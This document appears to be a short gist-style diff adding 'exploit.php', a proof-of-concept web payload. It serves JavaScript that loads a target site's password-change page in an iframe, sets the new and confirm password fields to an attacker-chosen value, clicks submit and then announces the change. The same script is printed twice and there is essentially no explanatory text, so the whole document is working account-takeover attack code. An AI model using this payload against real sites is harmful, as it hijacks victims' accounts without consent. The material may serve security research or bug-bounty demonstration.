Rhynorater · January 17, 2019 15:05
diff --git a/exploit.php b/exploit.php
 <?php
 header("Content-Type: application/javascript");
 ?>
 frame=document.createElement("iframe")
 frame.addEventListener("load", function() {
  setTimeout(function(){
          //Once the iframe loads, give it 1 second to load the DOM
          frame.contentDocument.getElementById("NewPassword").value="1337H4x0rz!!!"
          //Set new password
          frame.contentDocument.getElementById("ConfirmNewPassword").value="1337H4x0rz!!!"
          //Set confirm password
          frame.contentDocument.getElementById("SubmitButton").click()
          //Click the submit button
          setTimeout(function(){
            //Wait a couple seconds for the previous request to be sent
            alert("Your account password has been changed to 1337H4x0rz!!!")
          }, 2000)
  }, 1000)
 });
 //Create iframe and append it body
 frame.src="https://vulnerableSite.com/sensative/action.php"
 document.body.append(frame)
	<?php
	header("Content-Type: application/javascript");
	?>
	frame=document.createElement("iframe")
	frame.addEventListener("load", function() {
	setTimeout(function(){
	//Once the iframe loads, give it 1 second to load the DOM
	frame.contentDocument.getElementById("NewPassword").value="1337H4x0rz!!!"
	//Set new password
	frame.contentDocument.getElementById("ConfirmNewPassword").value="1337H4x0rz!!!"
	//Set confirm password
	frame.contentDocument.getElementById("SubmitButton").click()
	//Click the submit button
	setTimeout(function(){
	//Wait a couple seconds for the previous request to be sent
	alert("Your account password has been changed to 1337H4x0rz!!!")
	}, 2000)
	}, 1000)
	});
	//Create iframe and append it body
	frame.src="https://vulnerableSite.com/sensative/action.php"
	document.body.append(frame)